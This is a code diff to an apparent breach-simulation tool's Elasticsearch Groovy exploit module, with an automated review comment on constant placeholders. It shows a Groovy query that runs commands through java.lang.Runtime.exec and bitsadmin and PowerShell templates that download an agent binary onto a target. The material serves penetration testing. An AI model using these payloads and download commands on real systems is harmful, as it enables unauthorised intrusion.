diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 74be84a79..c4cc3e4a7 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -8,7 +8,7 @@ import json import logging import requests from exploit.web_rce import WebRCE -from model import WGET_HTTP_UPLOAD +from model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP from network.elasticfinger import ES_PORT, ES_SERVICE import re @@ -25,11 +25,6 @@ class ElasticGroovyExploiter(WebRCE): JAVA_CMD = GENERIC_QUERY \ % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" - # Both commands are prepared for use in future development - RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' - POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \ - r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" - _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): @@ -39,7 +34,7 @@ class ElasticGroovyExploiter(WebRCE): exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() exploit_config['dropper'] = True exploit_config['url_extensions'] = ['_search?pretty'] - exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP} + exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP} return exploit_config def get_open_service_ports(self, port_list, names):
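Review bot: The `'windows'` entry of `exploit_config['upload_commands']` in the third hunk now takes its template from `model.RDP_CMDLINE_HTTP`, whose definition is not part of this diff, so nothing visible confirms it still exposes exactly the `%(http_path)s` and `%(monkey_path)s` placeholders of the class attribute removed in the second hunk. If the shared constant carries other placeholders or extra text, the substitution (presumably done in the `WebRCE` base class) would raise or build a different command line than before, so it is worth checking against `model` and pinning the formatted string in a unit test. A comment above the assignment would record the contract, for example `# upload templates may only use %(http_path)s and %(monkey_path)s`, adjusted to whatever the base class actually supplies. The second hunk also drops `POWERSHELL_COMMAND` with no visible replacement, and the commit description should say whether that is intentional. `get_exploit_config` begins above this hunk, so the rest of its body is not reviewed here.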